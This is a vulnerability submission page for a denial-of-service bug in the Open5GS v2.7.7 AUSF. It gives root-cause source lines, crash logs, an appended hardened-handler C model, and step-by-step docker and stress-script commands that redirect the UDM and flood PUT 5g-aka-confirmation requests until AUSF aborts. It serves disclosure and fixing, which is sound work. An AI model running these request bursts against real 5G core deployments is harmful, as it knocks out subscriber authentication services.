Submit #817031: Open5GS AUSF v2.7.7 Denial of Service

Title: Open5GS AUSF v2.7.7 Denial of Service
Description:

### Open5GS Release, Revision, or Tag

v2.7.7

### Description

AUSF crashes when a valid authentication context exists and `PUT /nausf-auth/v1/ue-authentications/{authCtxId}/5g-aka-confirmation` is sent in repeated bursts while UDM keeps `POST /nudm-ueau/v1/{supi}/auth-events` hanging.

This follows the same pending-xact pattern as the already confirmed `POST /nausf-auth/v1/ue-authentications` timer-pool issue, but the final abort site is different:

```c
r = ausf_sbi_discover_and_send(...);
ogs_expect(r == OGS_OK);
ogs_assert(r != OGS_ERROR);
```

for the confirmation handler:

```c
bool ausf_nausf_auth_handle_authenticate_confirmation(...)
```

As with the POST route, client-side HTTP/2 streams are released on RST/close, while outbound `nudm-ueau` xacts and their response timers remain pending until timeout. Repeating short-lived confirmation bursts therefore consumes the timer pool until `ogs_timer_add()` fails, `ausf_sbi_discover_and_send()` returns `OGS_ERROR`, and AUSF aborts at `nausf-handler.c:115`.

### Root cause

- Entry route: `PUT /nausf-auth/v1/ue-authentications/{authCtxId}/5g-aka-confirmation`
- Preconditions: a valid auth context must already exist, and UDM must keep `POST /nudm-ueau/v1/{supi}/auth-events` hanging
- Exact crash site: `../src/ausf/nausf-handler.c:115`
- Upstream failures:
  - `../lib/core/ogs-timer.c:82-85`
  - `../lib/sbi/context.c:2592-2600`
  - `../src/ausf/sbi-path.c:97-103`
- Root cause family: timer pool exhaustion leading to assertion abort
- Controlling factor: number of short-lived confirmation requests whose outbound `auth-events` xacts remain pending

### Steps to reproduce

1. Start the controllable fake UDM:

```bash
docker stop fake-ausf-udm 2>/dev/null || true
printf 'control\n' > /home/ubuntu/open5gs_277/.audit_tmp/ausf_fake_udm.mode
docker run --rm -d \
  --name fake-ausf-udm \
  --network open5gs \
  -v /home/ubuntu/open5gs_277/.audit_tmp:/srv \
  node:24-alpine \
  node /srv/ausf_fake_udm.js
```

2. Restart AUSF, override `udm.open5gs.org` to the fake UDM, and create one valid auth context:

```bash
docker restart ausf
docker exec ausf sh -lc "grep -v 'udm.open5gs.org' /etc/hosts > /tmp/hosts.new && printf '10.33.33.9\tudm.open5gs.org\n' >> /tmp/hosts.new && cat /tmp/hosts.new > /etc/hosts"
docker run --rm --network open5gs curlimages/curl:8.10.1 \
  --http2-prior-knowledge -sS -D - \
  -H content-type:application/json \
  --data '{"supiOrSuci":"suci-0-001-01-0-0-0-000000000000001","servingNetworkName":"5G:mnc001.mcc001.3gppnetwork.org"}' \
  http://ausf.open5gs.org/nausf-auth/v1/ue-authentications
```

The returned confirmation path in this repro was:

```text
/nausf-auth/v1/ue-authentications/1/5g-aka-confirmation
```

3. Control case: one launch-only burst while UDM hangs `POST /auth-events`. AUSF should stay running.

```bash
printf 'hang-auth-events-post\n' > /home/ubuntu/open5gs_277/.audit_tmp/ausf_fake_udm.mode
docker exec fake-ausf-udm sh -lc 'AUSF_STRESS_METHOD=PUT AUSF_STRESS_PATH=/nausf-auth/v1/ue-authentications/1/5g-aka-confirmation AUSF_STRESS_BODY_FILE=/srv/ausf_confirmation_body.json AUSF_STRESS_CONNECTIONS=8 AUSF_STRESS_REQUESTS_PER_CONNECTION=256 AUSF_STRESS_LAUNCH_ONLY_MS=1000 node /srv/ausf_request_stress.js'
docker inspect -f '{{.State.Status}} {{.State.ExitCode}}' ausf
```

4. Malicious case: repeat the same burst several times so `auth-events` xacts accumulate and exhaust the timer pool.

```bash
docker exec fake-ausf-udm sh -lc 'for i in 1 2 3 4 5 6 7; do AUSF_STRESS_METHOD=PUT AUSF_STRESS_PATH=/nausf-auth/v1/ue-authentications/1/5g-aka-confirmation AUSF_STRESS_BODY_FILE=/srv/ausf_confirmation_body.json AUSF_STRESS_CONNECTIONS=8 AUSF_STRESS_REQUESTS_PER_CONNECTION=256 AUSF_STRESS_LAUNCH_ONLY_MS=1000 node /srv/ausf_request_stress.js; done'
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' ausf
docker logs --tail 120 ausf 2>&1
```

### Logs

```shell
04/23 01:59:22.204: [event] ERROR: Failed to allocate timer object from pool (../lib/core/ogs-timer.c:84)
04/23 01:59:22.204: [sbi] ERROR: ogs_timer_add() failed (../lib/sbi/context.c:2596)
04/23 01:59:22.204: [ausf] ERROR: ausf_sbi_discover_and_send() failed (../src/ausf/sbi-path.c:98)
04/23 01:59:22.212: [ausf] ERROR: ausf_nausf_auth_handle_authenticate_confirmation: Expectation `r == OGS_OK' failed. (../src/ausf/nausf-handler.c:114)
04/23 01:59:22.212: [ausf] FATAL: ausf_nausf_auth_handle_authenticate_confirmation: Assertion `r != OGS_ERROR' failed. (../src/ausf/nausf-handler.c:115)
```

### Expected behaviour

AUSF should reject excess pending confirmation work with a normal HTTP error and remain running.

### Observed Behaviour

Repeated launch-only confirmation bursts exhaust the timer pool for pending `auth-events` xacts and crash AUSF with exit code `139`.

### eNodeB/gNodeB

Not required.

### UE Models and versions

Not required.
Source: https://github.com/open5gs/open5gs/issues/4472
User: ZiyuLin (UID 93568)
Submission: 01/05/2026 10:36 (1 month ago)
Moderation: 16/05/2026 14:38 (15 days later)
Status: Accepted
VulDB entry: 364332 [Open5GS up to 2.7.7 AUSF nausf-handler.c ogs_timer_add denial of service]
Points: 20
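
A minimal model of the failure mode and of the "Expected behaviour" in the description, as an added example that is not Open5GS code and not part of the submission: a fixed timer pool whose slots are released only on timeout, with a handler that turns exhaustion into an HTTP status instead of an assertion abort. The pool size, per-context cap, tick timeout, function names and the 202/404/429/503 status choices are all constructed assumptions.

```c
#include <stdbool.h>
#include <stddef.h>

/* Constructed model values, not taken from Open5GS. */
#define POOL_SIZE   6   /* shared response-timer pool */
#define CTX_COUNT   4   /* auth contexts in the model */
#define CTX_PENDING 2   /* assumed cap on pending xacts per context */
#define TIMEOUT     10  /* response timeout in ticks */

typedef struct { bool used; int ctx; unsigned deadline; } xact_timer_t;
static xact_timer_t pool[POOL_SIZE];
static int pending[CTX_COUNT];

/* Fixed-pool allocation: returns NULL once every slot is taken. */
static xact_timer_t *timer_add(int ctx, unsigned now) {
    for (size_t i = 0; i < POOL_SIZE; i++) {
        if (!pool[i].used) {
            pool[i] = (xact_timer_t){ true, ctx, now + TIMEOUT };
            pending[ctx]++;
            return &pool[i];
        }
    }
    return NULL;
}

/* A client-side reset frees nothing; slots come back only on expiry. */
static int expire(unsigned now) {
    int freed = 0;
    for (size_t i = 0; i < POOL_SIZE; i++) {
        if (pool[i].used && pool[i].deadline <= now) {
            pool[i].used = false;
            pending[pool[i].ctx]--;
            freed++;
        }
    }
    return freed;
}

/* Hardened handler: exhaustion maps to an HTTP status instead of abort(). */
static int handle_confirmation(int ctx, unsigned now) {
    if (ctx < 0 || ctx >= CTX_COUNT) return 404;
    if (pending[ctx] >= CTX_PENDING) return 429;  /* per-context cap */
    if (timer_add(ctx, now) == NULL) return 503;  /* pool exhausted */
    return 202;  /* forwarded, waiting on the upstream response */
}
```

The per-context cap keeps a single `authCtxId` from draining the shared pool, and the 503 branch covers the case where many contexts together still exhaust it.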
